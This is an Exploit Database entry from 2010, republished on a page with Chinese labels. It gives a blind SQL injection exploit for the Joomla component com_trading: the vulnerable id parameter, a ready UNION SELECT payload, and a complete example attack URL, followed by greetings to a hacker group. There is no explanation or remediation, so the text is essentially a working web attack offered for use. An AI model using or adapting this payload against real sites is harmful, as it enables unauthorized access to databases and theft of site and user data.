Joomla! Component com_trading – Blind SQL Injection

• Exploit Database
• 12 阅读

• 作者： DevilZ TM
  日期： 2010-04-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11992/

• # Title : Joomla Component com_trading Blind SQL Injection Vulnerability
  # Author: DevilZ TM
  # Data: 2010-04-01
  
  [~]######################################### InformatioN #############################################[~]
   
  [~] Title : Joomla Component com_trading Blind SQL Injection Vulnerability
  [~] Author: DevilZ TM By D3v1l
  [~] Homepage: http://www.DEVILZTM.com
  [~] Email : Expl0it@DevilZTM.Com
  [~] Contact : D3v1l.blackhat@yahoo.com
   
  [~]######################################### ExploiT #############################################[~]
   
  [~] Vulnerable File :
   
  http://127.0.0.1/index.php?option=com_trading&task=showsharedetails&id=[Blind SQL]
   
  [~] ExploiT :
   
  1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
   
  [~] Example :
   
  http://127.0.0.1/index.php?option=com_trading&task=showsharedetails&id=1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
  
   
  [~]######################################### ThankS To ... ############################################[~]
   
  [~] Special Thanks To My Best FriendS :
   
  Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
   
  [~] IRANIAN Young HackerZ
   
  [~] GreetZ : Exploit-DB TeaM
  
  [~]######################################### FinisH :D #############################################[~]